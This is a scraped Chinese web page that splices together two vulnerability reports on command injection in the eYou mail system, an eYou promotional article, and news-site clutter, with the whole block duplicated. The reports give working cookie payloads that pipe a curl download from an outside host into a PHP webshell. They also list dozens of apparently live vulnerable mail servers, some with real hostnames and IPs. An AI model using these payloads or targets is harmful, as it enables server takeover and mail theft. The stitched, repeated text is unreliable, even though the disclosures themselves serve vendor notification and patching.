亿邮官网eYou 不是早就倒了吗
点击联系发帖人
时间:2016-12-04 17:21
分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向第三方安全合作伙伴开放(、)
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
亿邮邮件系统命令执行可GetShell两处
详细说明:
亿邮的使用量就不多说了,用户量非常可观啊
但是就是问题还很多,安全方面基本上还停留在在几年前的状态
虽然估计发布了新版本,但是用户还是使用问题较多的老版本较多。
第一处命令执行:
文件/user/autoComplete.php
code 区域$arr = explode(&&&,$_COOKIE[&USER&]);
//--验证cookie。
for($i=0;$i&count($arr);$i++)
if(ereg(&^SKIN=(.*)$&,$arr[$i],$reg))
$skin = trim($reg[1]);
if(ereg(&^UID=(.*)$&,$arr[$i],$reg))
= trim($reg[1]);
if(ereg(&^DOMAIN=(.*)$&,$arr[$i],$reg))
= trim($reg[1]);
if(ereg(&^TOKEN=(.*)$&,$arr[$i],$reg))
= trim($reg[1]);
$part = $_GET['s'];
//$uid = &support&;
//$domain = &**.**.**.**&;
$users = readAddress($uid, $domain);
直接从cookie中获取参数USER
然后赋值给uid和domain
然后看看函数readAddress($uid, $domain);
code 区域function readAddress($uid,$domain){
$binary = array();
$userDir = getUserDir($uid,$domain);
$addressDir = trim($userDir, &\n\r &).&/Profile/alias.individual&;
if(!is_file($addressDir))
$fp = fopen($addressDir, &r&);
echo &打开地址薄失败&;
while(false != ($content = fgets($fp, 568))){
$binary[] =unpack(&a20nick_name/a40email/a40name/a60h_street_address/a30h_city/a30h_province/a8h_zip/a20h_country/a16h_phone/a30c_company/a60c_street_address/a30c_city/a30c_province/a8c_zip/a20c_country/a16c_phone/a16pager/a16cellular/a16fax/a20icq/a30other/a5b_year/a3b_month/a3b_day&,$content);
//var_dump($binary);
最后,uid和domain又进入了函数getUserDir($uid,$domain)
我们继续跟进getUserDir
code 区域function getUserDir($uid, $domain) {
$handle = popen(&/var/eyou/sbin/hashid $uid $domain&, 'r');
$read = fread($handle, 2096);
pclose($handle);
最后uid和domain进入了popen
$handle = popen(&/var/eyou/sbin/hashid $uid $domain&, 'r');
这里的/var/eyou/sbin/hashid是亿邮系统执行命令的
此时,uid和domain没有经过任何过滤直接进入了命令,导致任意命令执行
漏洞利用:
设置cookie为:
UID=1|curl http://**.**.**.**/test.txt&&testfortest.php
然后访问localhost/user/autoComplete.php即可
此时会在localhost/user/下生成testfortest.php
shell地址为:
localhost/user/testfortest.php
第二处命令执行:
文件/user/storage_explort.php
code 区域&?php
* 用户网络存储列表
* 该页面显示登录邮箱用户的网络存储文件列表,选择后添加到邮件的附件中。
* @author FengHui &fenghui@**.**.**.**&
* @copyright 2008 eY**.**.**.**
* @version storage_explore.php
require_once('/var/eyou/apache/htdocs/config.php');
require_once(PATH.'inc/function.php');
require_once(PATH.'inc/libeyou.php');
require_once(PATH.'inc/operate.php');
= getCookieUserValue('SKIN');
= getCookieUserValue('UID');
= getCookieUserValue('DOMAIN');
$user_dir_path
= getUserDirPath($uid, $domain);
$storage_index_path = $user_dir_path.'/storage/Index/';
$storage_data_path
= $user_dir_path.'/storage/Data/';
$userinfo = get_userinfo($uid , $domain);
// 获取用户允许上传的最大附件大小
$attachsize = (int)($userinfo['attachsize'][0]);
$is_submit = $_POST['is_submit'] ? true :
跟进getCookieUserValue函数:
code 区域function getCookieUserValue($key) {
$user_arr = explode('&', cookie('USER'));
$n = count($user_arr);
for ($i = 0; $i & $n; $i++) {
$g_arr = explode('=', $user_arr[$i]);
if ($g_arr[0] == $key) {
return $g_arr[1];
跟进cookie函数:
code 区域function cookie($name){
if (array_key_exists($name, $_COOKIE)) return $_COOKIE[$name];
return '';
整个过程没有对cookie 进行过滤
直接就爱那个cookie中USER的值取出来,然后进入了getUserDirPath函数
来看看getUserDirPath函数:
code 区域/**
* 获取用户目录的路径
* @param string $uid
* @param string $domain
function getUserDirPath($uid, $domain) {
$cmd = &/var/eyou/sbin/hashid $uid $domain&;
$path = `$cmd`;
$path = trim($path);
uid和domain直接进入了命令,导致命令执行。
漏洞利用:
将cookie设置为:
USER=UID=1|curl http://**.**.**.**/test.txt&&testfortest1.php
然后访问localhost/user/storage_explore.php
此时会在localhost/user/下生成testfortest1.php文件
shell地址为:
localhost/user/testfortest1.php
漏洞证明:
如外网实例:
http://**.**.**.**//user/testfortest1.php
修复方案:
在$handle = popen(&/var/eyou/sbin/hashid $uid $domain&, 'r');执行命令时
过滤输入的参数
可以使用escapeshellarg或者escapeshellcmd对输入的参数进行过滤。
版权声明:转载请注明来源 @
厂商回应:
危害等级:中
漏洞Rank:10
确认时间: 17:35
厂商回复:
存在于旧版系统中,亿邮解决方案,尽快联系用户修补,非常感谢提供!
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
还来啊,不重复?
目测: /4011/
为什么要匿名?
@小新 就是这两个了吧。
mark 坐等详情,@管理员 应该知道是不是了吧
。。。这么悲催
登录后才能发表评论,请先亿邮邮件系统命令执行漏洞(大量邮件系统沦陷实例)
(window.slotbydup=window.slotbydup || []).push({
id: '2611110',
container: s,
size: '240,200',
display: 'inlay-fix'
您当前位置: &
[ 所属分类
| 时间 2016 |
作者 红领巾 ]
亿邮邮件系统命令执行漏洞(大量邮件系统沦陷实例)
北京亿中邮信息技术有限公司
pangshenjie
已交由第三方合作机构(cncert国家互联网应急中心)处理
亿邮,命令执行
利用:/user/list.php 爆路径
然后cookie内USER修改为如下:
UID=1+|+echo+test+&&/路径/xxx.txt
eyou邮件系统早期版本中存在大量的exec().system() ``等敏感可能导致命令执的敏感函数和代码
其中,/inc/function.php 中存在如下代码:
function getUserDirPath($uid, $domain) {
$cmd = &/var/eyou/sbin/hashid $uid $domain&;
$path = `$cmd`; //使用反引号导致$cmd可以被执行
$path = trim($path);
search了一下,在/user/storage_explore.php 中调用该函数:
$skin = getCookieUserValue('SKIN');
$uid = getCookieUserValue('UID');
$domain = getCookieUserValue('DOMAIN');
$user_dir_path = getUserDirPath($uid, $domain);
$storage_index_path = $user_dir_path.'/storage/Index/';
$storage_data_path = $user_dir_path.'/storage/Data/';
$userinfo = get_userinfo($uid , $domain);
$uid , $domain 分别都是getCookieUserValue 函数来获取的,该函数也在function.php
function getCookieUserValue($key) {
$user_arr = explode('&', cookie('USER'));
$n = count($user_arr);
for ($i = 0; $i & $n; $i++) {
$g_arr = explode('=', $user_arr[$i]);
if ($g_arr[0] == $key) {
return $g_arr[1];
然后就可以呵呵呵了。
控制cookie中USER内容中UID=+|+echo+123+&&/tmp/xxx.txt
即可执行命令。
另外厂商还附送了一枚爆路径:
/user/list.php
攻击者完全可以利用此处获取webshell控制系统
漏洞证明:
/user/storage_fold_explore.php
/user/storage_explore.php
控制cookie 中 USER字段的值:UID=1+|+patload
另外测试的一个站发现开了gpc了。echo写shell的时候里面的尖括号等符号需要转义,
而转义符号又会被gpc再转义一次。
so,可以 curl http:/// &&path/shell.php 写shell。
虽然应该涉及到的不是eyou最新版本,但是网上依然可以找到大量实例,google:intitle:亿邮通讯 前几页就找到不少(另外应该还有不少改了关键字的):
http://mail./user/storage_explore.php
/user/storage_explore.php
/user/storage_explore.php
/user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
http://mail.glzx.net/user/storage_explore.php
/user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
/user/storage_explore.php
http://221.199.11.171/user//storage_explore.php
http://www./user//storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
.cn:8080/user/storage_explore.php
http://email./user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
http://m./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail.//user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
/user/storage_explore.php
/user/storage_explore.php
.cn:802/user/storage_explore.php
http://mail./user/storage_explore.php
http://email.10050.net/user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
http://ms./user/storage_explore.php
/user/storage_explore.php
/user/storage_explore.php
/user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
.cn/user/storage_explore.php
http://mail./user/storage_explore.php
http://210.43.128.17/user/storage_explore.php
修复方案:
版权声明:转载请注明来源 pangshenjie@乌云
本文web安全相关术语:黑盒测试方法 黑盒测试和白盒测试 网站安全检测 360网站安全检测 网络安全知识 网络安全技术 网络信息安全 网络安全工程师
转载请注明本文标题:本站链接:
分享请点击:
1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
阅读(1271)
脚步无法到达的地方,目光可以到达;目光无法到达的地方,梦想可以到达。
手机客户端
,专注代码审计及安全周边编程,转载请注明出处:http://www.codesec.net
转载文章如有侵权,请邮件 admin[at]codesec.net您现在的位置: >
亿邮eYou自主研发云邮箱 推动邮件系统进入云时代
随着网络的兴起,电子邮件成为人们工作和生活中不可或缺的一种沟通方式。电子邮件给人们带来了方便,但也有一些地方不尽人意,如垃圾邮件猖獗,千篇一律的交互设计,不支持大附件传送,让人心生厌倦。对于一个企业或组织来讲,而拥有一套安全、稳定、高速的邮件系统,是组织成员享用高质量邮件服务的前提。
作为中国第一大邮件系统软件与全方位沟通解决方案提供商的亿邮,13年来一直致力于邮件系统的研发与实践,不断根据用户的需求提升邮件系统的实用性和用户体验。近年,云技术在各个领域得到推广应用,而亿邮正是将云技术应用于邮件系统的邮件服务商,亿邮团队自主研发“云”邮箱,推动邮件系统步入“云”时代。
什么是云?
不知道什么时候,云竟成了互联网技术领域的“红人”,到底什么是云?很多人并不清楚。其实云是网络、互联网的一种比喻说法。过去在图中往往用云来表示电信网,后来也用来表示互联网和底层基础设施的抽象。
具体的说,云有狭义和广义之分。狭义云计算指IT基础设施的交付和使用模式,指通过网络以按需、易扩展的方式获得所需资源;广义云计算指服务的交付和使用模式,指通过网络以按需、易扩展的方式获得所需服务。这种服务可以是IT和软件、互联网相关,也可是其他服务。它意味着计算能力也可作为一种商品通过互联网进行流通。如云计算、云阅读、云邮件等。
什么是云邮件?
云邮件是指采用云计算技术,部署的邮箱系统,主要为企业级邮箱应用。云邮箱的总体优势主要体现在稳定性和安全性更高,邮箱容量更大。用户不用担心邮件服务器发生宕机导致邮箱不能使用,也不用担心会遭到DDoS攻击导致的服务停止。其它的优势会根据不同厂商的产品设计和基础设施建设的投入出现差异。例如机房建设标准与规模,反垃圾病毒邮件网关,海外转发服务器的部署,邮件监控功能,邮件加密技术,管理员功能设计以及其它附加功能等。
亿邮云邮箱的优势
大家知道了云邮箱,就是应用了云技术部署的邮箱系统,一定想知道由行业龙头亿邮软件研发的云邮箱具体有哪些技术优势。经过一些细致的调研和沟通,小编总结出了以下几点:
1、基于分布式文件系统(云存储)的邮件存储方式
亿邮云邮件系统应用当前行业领先的技术,有效的将邮件系统的数据与云存储技术进行整合。为前端海量用户信息提供高效率,高安 全性的系统服务。亿邮云存储系统是一套分布式网络存储系统,采用C/S通信模式,通过内部专有协议可高效的进行文件存储、删除、读取等操作。亿邮云存储支持对存储服务器的磁盘设备进行在线扩容和维护,支持对文件的合并存储、引用计数、异步删除等操作,存储上的 数据可以实时热备,完美的解决了磁盘损坏带来的各种损失。
云存储写原理图
2、邮件索引存储方式符合单位邮件服务业务特点
邮件索引是用来标示一封邮件的属性。例如:属于谁、处在哪个文件夹、已读未读、邮件存储的位置、大小、重要性,是否带附件等信息。在用户访问文件夹时,系统需要返回给用户邮件列表,这种邮件索引机制即为某些邮件厂商所宣传的二级缓存机制。eYou邮件系统采用数据库存储索引的技术方案,通过多层缓存机制、分布式水平拆分技术,贴合邮件业务随时可能出现的系统扩容等复杂多变的需求,数据库存储邮件索引正好切合了企事业单位邮件服务的技术与业务特点。
3、灵活多样的队列调度设计
eYou邮件系统针对企业应用,采用了与其他邮件厂商及开源邮件系统不同的队列设计:多队列,多独立调度器的邮件调度方式。信件进入系统后根据不同的情况,系统采取不同的处理方式。例如:投递给本地用户、投递到本地邮件列表、投递到其他邮件服务器、退信到其他邮件服务器、需要给管理员进行审批的邮件等。
eYou邮件系统所采用的多
队列,多独立调度器的设计,则巧妙地避免了只有一个队列导致的系统不稳定性、系统可靠性下降、扩展性受限等。提高了系统的稳定及可靠性的同时还拥有很强的二次开发承载能力。
除此之外,亿邮云邮箱还拥有亿邮云办公套件,包含即时通讯、邮件客户端、云通讯录、云盘、登陆通等配套产品,真正为您实现漫步“云端”的工作体验!
认识了云,认识了云邮箱,也知道了亿邮云邮箱的技术优势,是不是已经对云邮箱十分向往了?其实亿邮云邮箱不止应用了云技术,还融入了亿邮团队十几年的智慧结晶,为您提供一套高性能、高可靠、高安全、高可扩展、高可管理的邮件系统,了解更多亿邮云邮箱的功能及优势,可登陆亿邮官网(www.eyou.net)。来源中国商报网)
更多关于的新闻
&/&&人已评
数据加载中……
这两天,上海的气温节节攀升,着...
今天(3月6日)下午近1点,在...
新民网记者今日(6日)采访中发...
日前有媒体报道称,“国五条”实...
3月1日“国五条”政策出台。3...
“国五条”细则日前颁布,明确二...
客流日益拥挤却又没有屏蔽...
随着时代的变迁,“学雷锋...
||||||||||
文汇新民联合报业集团新民报系成员:||||
战略合作伙伴:||||
新民晚报官方网站
(C)2012 &All rights reserved.
“做民调 赢大奖”转盘抽奖
科沃斯地宝、交通卡、面包机、数码礼包、象印保温瓶等百份奖品等你拿
去试试手气
您已投过票
“做民调 赢大奖”转盘抽奖
科沃斯地宝、交通卡、面包机、数码礼包、象印保温瓶等百份奖品等你拿
去试试手气
密&&&&码:
下次自动登录&&&&
没有账号?&&&&
评论成功,谢谢参与!
点“看微博”查看您的
评论成功,谢谢参与!亿邮(eYou)电子邮件系统 北京亿中邮信息技术有限公司 中国第一大邮件系统软件及整体解决方案提供商亿邮新闻 8 篇新闻 1/1 页
北京亿中邮信息技术有限公司(亿邮通讯)&&&&版权所有&&&&客服热线:&&&&&&&&&& &&&&&&&& && 京ICP备号}
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向第三方安全合作伙伴开放(、)
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
亿邮邮件系统命令执行可GetShell两处
详细说明:
亿邮的使用量就不多说了,用户量非常可观啊
但是就是问题还很多,安全方面基本上还停留在在几年前的状态
虽然估计发布了新版本,但是用户还是使用问题较多的老版本较多。
第一处命令执行:
文件/user/autoComplete.php
code 区域$arr = explode(&&&,$_COOKIE[&USER&]);
//--验证cookie。
for($i=0;$i&count($arr);$i++)
if(ereg(&^SKIN=(.*)$&,$arr[$i],$reg))
$skin = trim($reg[1]);
if(ereg(&^UID=(.*)$&,$arr[$i],$reg))
= trim($reg[1]);
if(ereg(&^DOMAIN=(.*)$&,$arr[$i],$reg))
= trim($reg[1]);
if(ereg(&^TOKEN=(.*)$&,$arr[$i],$reg))
= trim($reg[1]);
$part = $_GET['s'];
//$uid = &support&;
//$domain = &**.**.**.**&;
$users = readAddress($uid, $domain);
直接从cookie中获取参数USER
然后赋值给uid和domain
然后看看函数readAddress($uid, $domain);
code 区域function readAddress($uid,$domain){
$binary = array();
$userDir = getUserDir($uid,$domain);
$addressDir = trim($userDir, &\n\r &).&/Profile/alias.individual&;
if(!is_file($addressDir))
$fp = fopen($addressDir, &r&);
echo &打开地址薄失败&;
while(false != ($content = fgets($fp, 568))){
$binary[] =unpack(&a20nick_name/a40email/a40name/a60h_street_address/a30h_city/a30h_province/a8h_zip/a20h_country/a16h_phone/a30c_company/a60c_street_address/a30c_city/a30c_province/a8c_zip/a20c_country/a16c_phone/a16pager/a16cellular/a16fax/a20icq/a30other/a5b_year/a3b_month/a3b_day&,$content);
//var_dump($binary);
最后,uid和domain又进入了函数getUserDir($uid,$domain)
我们继续跟进getUserDir
code 区域function getUserDir($uid, $domain) {
$handle = popen(&/var/eyou/sbin/hashid $uid $domain&, 'r');
$read = fread($handle, 2096);
pclose($handle);
最后uid和domain进入了popen
$handle = popen(&/var/eyou/sbin/hashid $uid $domain&, 'r');
这里的/var/eyou/sbin/hashid是亿邮系统执行命令的
此时,uid和domain没有经过任何过滤直接进入了命令,导致任意命令执行
漏洞利用:
设置cookie为:
UID=1|curl http://**.**.**.**/test.txt&&testfortest.php
然后访问localhost/user/autoComplete.php即可
此时会在localhost/user/下生成testfortest.php
shell地址为:
localhost/user/testfortest.php
第二处命令执行:
文件/user/storage_explort.php
code 区域&?php
* 用户网络存储列表
* 该页面显示登录邮箱用户的网络存储文件列表,选择后添加到邮件的附件中。
* @author FengHui &fenghui@**.**.**.**&
* @copyright 2008 eY**.**.**.**
* @version storage_explore.php
require_once('/var/eyou/apache/htdocs/config.php');
require_once(PATH.'inc/function.php');
require_once(PATH.'inc/libeyou.php');
require_once(PATH.'inc/operate.php');
= getCookieUserValue('SKIN');
= getCookieUserValue('UID');
= getCookieUserValue('DOMAIN');
$user_dir_path
= getUserDirPath($uid, $domain);
$storage_index_path = $user_dir_path.'/storage/Index/';
$storage_data_path
= $user_dir_path.'/storage/Data/';
$userinfo = get_userinfo($uid , $domain);
// 获取用户允许上传的最大附件大小
$attachsize = (int)($userinfo['attachsize'][0]);
$is_submit = $_POST['is_submit'] ? true :
跟进getCookieUserValue函数:
code 区域function getCookieUserValue($key) {
$user_arr = explode('&', cookie('USER'));
$n = count($user_arr);
for ($i = 0; $i & $n; $i++) {
$g_arr = explode('=', $user_arr[$i]);
if ($g_arr[0] == $key) {
return $g_arr[1];
跟进cookie函数:
code 区域function cookie($name){
if (array_key_exists($name, $_COOKIE)) return $_COOKIE[$name];
return '';
整个过程没有对cookie 进行过滤
直接就爱那个cookie中USER的值取出来,然后进入了getUserDirPath函数
来看看getUserDirPath函数:
code 区域/**
* 获取用户目录的路径
* @param string $uid
* @param string $domain
function getUserDirPath($uid, $domain) {
$cmd = &/var/eyou/sbin/hashid $uid $domain&;
$path = `$cmd`;
$path = trim($path);
uid和domain直接进入了命令,导致命令执行。
漏洞利用:
将cookie设置为:
USER=UID=1|curl http://**.**.**.**/test.txt&&testfortest1.php
然后访问localhost/user/storage_explore.php
此时会在localhost/user/下生成testfortest1.php文件
shell地址为:
localhost/user/testfortest1.php
漏洞证明:
如外网实例:
http://**.**.**.**//user/testfortest1.php
修复方案:
在$handle = popen(&/var/eyou/sbin/hashid $uid $domain&, 'r');执行命令时
过滤输入的参数
可以使用escapeshellarg或者escapeshellcmd对输入的参数进行过滤。
版权声明:转载请注明来源 @
厂商回应:
危害等级:中
漏洞Rank:10
确认时间: 17:35
厂商回复:
存在于旧版系统中,亿邮解决方案,尽快联系用户修补,非常感谢提供!
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
还来啊,不重复?
目测: /4011/
为什么要匿名?
@小新 就是这两个了吧。
mark 坐等详情,@管理员 应该知道是不是了吧
。。。这么悲催
登录后才能发表评论,请先亿邮邮件系统命令执行漏洞(大量邮件系统沦陷实例)
(window.slotbydup=window.slotbydup || []).push({
id: '2611110',
container: s,
size: '240,200',
display: 'inlay-fix'
您当前位置: &
[ 所属分类
| 时间 2016 |
作者 红领巾 ]
亿邮邮件系统命令执行漏洞(大量邮件系统沦陷实例)
北京亿中邮信息技术有限公司
pangshenjie
已交由第三方合作机构(cncert国家互联网应急中心)处理
亿邮,命令执行
利用:/user/list.php 爆路径
然后cookie内USER修改为如下:
UID=1+|+echo+test+&&/路径/xxx.txt
eyou邮件系统早期版本中存在大量的exec().system() ``等敏感可能导致命令执的敏感函数和代码
其中,/inc/function.php 中存在如下代码:
function getUserDirPath($uid, $domain) {
$cmd = &/var/eyou/sbin/hashid $uid $domain&;
$path = `$cmd`; //使用反引号导致$cmd可以被执行
$path = trim($path);
search了一下,在/user/storage_explore.php 中调用该函数:
$skin = getCookieUserValue('SKIN');
$uid = getCookieUserValue('UID');
$domain = getCookieUserValue('DOMAIN');
$user_dir_path = getUserDirPath($uid, $domain);
$storage_index_path = $user_dir_path.'/storage/Index/';
$storage_data_path = $user_dir_path.'/storage/Data/';
$userinfo = get_userinfo($uid , $domain);
$uid , $domain 分别都是getCookieUserValue 函数来获取的,该函数也在function.php
function getCookieUserValue($key) {
$user_arr = explode('&', cookie('USER'));
$n = count($user_arr);
for ($i = 0; $i & $n; $i++) {
$g_arr = explode('=', $user_arr[$i]);
if ($g_arr[0] == $key) {
return $g_arr[1];
然后就可以呵呵呵了。
控制cookie中USER内容中UID=+|+echo+123+&&/tmp/xxx.txt
即可执行命令。
另外厂商还附送了一枚爆路径:
/user/list.php
攻击者完全可以利用此处获取webshell控制系统
漏洞证明:
/user/storage_fold_explore.php
/user/storage_explore.php
控制cookie 中 USER字段的值:UID=1+|+patload
另外测试的一个站发现开了gpc了。echo写shell的时候里面的尖括号等符号需要转义,
而转义符号又会被gpc再转义一次。
so,可以 curl http:/// &&path/shell.php 写shell。
虽然应该涉及到的不是eyou最新版本,但是网上依然可以找到大量实例,google:intitle:亿邮通讯 前几页就找到不少(另外应该还有不少改了关键字的):
http://mail./user/storage_explore.php
/user/storage_explore.php
/user/storage_explore.php
/user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
http://mail.glzx.net/user/storage_explore.php
/user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
/user/storage_explore.php
http://221.199.11.171/user//storage_explore.php
http://www./user//storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
.cn:8080/user/storage_explore.php
http://email./user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
http://m./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail.//user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
/user/storage_explore.php
/user/storage_explore.php
.cn:802/user/storage_explore.php
http://mail./user/storage_explore.php
http://email.10050.net/user/storage_explore.php
http://mail./user/storage_explore.php
/user/storage_explore.php
http://ms./user/storage_explore.php
/user/storage_explore.php
/user/storage_explore.php
/user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
http://mail./user/storage_explore.php
.cn/user/storage_explore.php
http://mail./user/storage_explore.php
http://210.43.128.17/user/storage_explore.php
修复方案:
版权声明:转载请注明来源 pangshenjie@乌云
本文web安全相关术语:黑盒测试方法 黑盒测试和白盒测试 网站安全检测 360网站安全检测 网络安全知识 网络安全技术 网络信息安全 网络安全工程师
转载请注明本文标题:本站链接:
分享请点击:
1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
阅读(1271)
脚步无法到达的地方,目光可以到达;目光无法到达的地方,梦想可以到达。
手机客户端
,专注代码审计及安全周边编程,转载请注明出处:http://www.codesec.net
转载文章如有侵权,请邮件 admin[at]codesec.net您现在的位置: >
亿邮eYou自主研发云邮箱 推动邮件系统进入云时代
随着网络的兴起,电子邮件成为人们工作和生活中不可或缺的一种沟通方式。电子邮件给人们带来了方便,但也有一些地方不尽人意,如垃圾邮件猖獗,千篇一律的交互设计,不支持大附件传送,让人心生厌倦。对于一个企业或组织来讲,而拥有一套安全、稳定、高速的邮件系统,是组织成员享用高质量邮件服务的前提。
作为中国第一大邮件系统软件与全方位沟通解决方案提供商的亿邮,13年来一直致力于邮件系统的研发与实践,不断根据用户的需求提升邮件系统的实用性和用户体验。近年,云技术在各个领域得到推广应用,而亿邮正是将云技术应用于邮件系统的邮件服务商,亿邮团队自主研发“云”邮箱,推动邮件系统步入“云”时代。
什么是云?
不知道什么时候,云竟成了互联网技术领域的“红人”,到底什么是云?很多人并不清楚。其实云是网络、互联网的一种比喻说法。过去在图中往往用云来表示电信网,后来也用来表示互联网和底层基础设施的抽象。
具体的说,云有狭义和广义之分。狭义云计算指IT基础设施的交付和使用模式,指通过网络以按需、易扩展的方式获得所需资源;广义云计算指服务的交付和使用模式,指通过网络以按需、易扩展的方式获得所需服务。这种服务可以是IT和软件、互联网相关,也可是其他服务。它意味着计算能力也可作为一种商品通过互联网进行流通。如云计算、云阅读、云邮件等。
什么是云邮件?
云邮件是指采用云计算技术,部署的邮箱系统,主要为企业级邮箱应用。云邮箱的总体优势主要体现在稳定性和安全性更高,邮箱容量更大。用户不用担心邮件服务器发生宕机导致邮箱不能使用,也不用担心会遭到DDoS攻击导致的服务停止。其它的优势会根据不同厂商的产品设计和基础设施建设的投入出现差异。例如机房建设标准与规模,反垃圾病毒邮件网关,海外转发服务器的部署,邮件监控功能,邮件加密技术,管理员功能设计以及其它附加功能等。
亿邮云邮箱的优势
大家知道了云邮箱,就是应用了云技术部署的邮箱系统,一定想知道由行业龙头亿邮软件研发的云邮箱具体有哪些技术优势。经过一些细致的调研和沟通,小编总结出了以下几点:
1、基于分布式文件系统(云存储)的邮件存储方式
亿邮云邮件系统应用当前行业领先的技术,有效的将邮件系统的数据与云存储技术进行整合。为前端海量用户信息提供高效率,高安 全性的系统服务。亿邮云存储系统是一套分布式网络存储系统,采用C/S通信模式,通过内部专有协议可高效的进行文件存储、删除、读取等操作。亿邮云存储支持对存储服务器的磁盘设备进行在线扩容和维护,支持对文件的合并存储、引用计数、异步删除等操作,存储上的 数据可以实时热备,完美的解决了磁盘损坏带来的各种损失。
云存储写原理图
2、邮件索引存储方式符合单位邮件服务业务特点
邮件索引是用来标示一封邮件的属性。例如:属于谁、处在哪个文件夹、已读未读、邮件存储的位置、大小、重要性,是否带附件等信息。在用户访问文件夹时,系统需要返回给用户邮件列表,这种邮件索引机制即为某些邮件厂商所宣传的二级缓存机制。eYou邮件系统采用数据库存储索引的技术方案,通过多层缓存机制、分布式水平拆分技术,贴合邮件业务随时可能出现的系统扩容等复杂多变的需求,数据库存储邮件索引正好切合了企事业单位邮件服务的技术与业务特点。
3、灵活多样的队列调度设计
eYou邮件系统针对企业应用,采用了与其他邮件厂商及开源邮件系统不同的队列设计:多队列,多独立调度器的邮件调度方式。信件进入系统后根据不同的情况,系统采取不同的处理方式。例如:投递给本地用户、投递到本地邮件列表、投递到其他邮件服务器、退信到其他邮件服务器、需要给管理员进行审批的邮件等。
eYou邮件系统所采用的多
队列,多独立调度器的设计,则巧妙地避免了只有一个队列导致的系统不稳定性、系统可靠性下降、扩展性受限等。提高了系统的稳定及可靠性的同时还拥有很强的二次开发承载能力。
除此之外,亿邮云邮箱还拥有亿邮云办公套件,包含即时通讯、邮件客户端、云通讯录、云盘、登陆通等配套产品,真正为您实现漫步“云端”的工作体验!
认识了云,认识了云邮箱,也知道了亿邮云邮箱的技术优势,是不是已经对云邮箱十分向往了?其实亿邮云邮箱不止应用了云技术,还融入了亿邮团队十几年的智慧结晶,为您提供一套高性能、高可靠、高安全、高可扩展、高可管理的邮件系统,了解更多亿邮云邮箱的功能及优势,可登陆亿邮官网(www.eyou.net)。来源中国商报网)
更多关于的新闻
&/&&人已评
数据加载中……
这两天,上海的气温节节攀升,着...
今天(3月6日)下午近1点,在...
新民网记者今日(6日)采访中发...
日前有媒体报道称,“国五条”实...
3月1日“国五条”政策出台。3...
“国五条”细则日前颁布,明确二...
客流日益拥挤却又没有屏蔽...
随着时代的变迁,“学雷锋...
||||||||||
文汇新民联合报业集团新民报系成员:||||
战略合作伙伴:||||
新民晚报官方网站
(C)2012 &All rights reserved.
“做民调 赢大奖”转盘抽奖
科沃斯地宝、交通卡、面包机、数码礼包、象印保温瓶等百份奖品等你拿
去试试手气
您已投过票
“做民调 赢大奖”转盘抽奖
科沃斯地宝、交通卡、面包机、数码礼包、象印保温瓶等百份奖品等你拿
去试试手气
密&&&&码:
下次自动登录&&&&
没有账号?&&&&
评论成功,谢谢参与!
点“看微博”查看您的
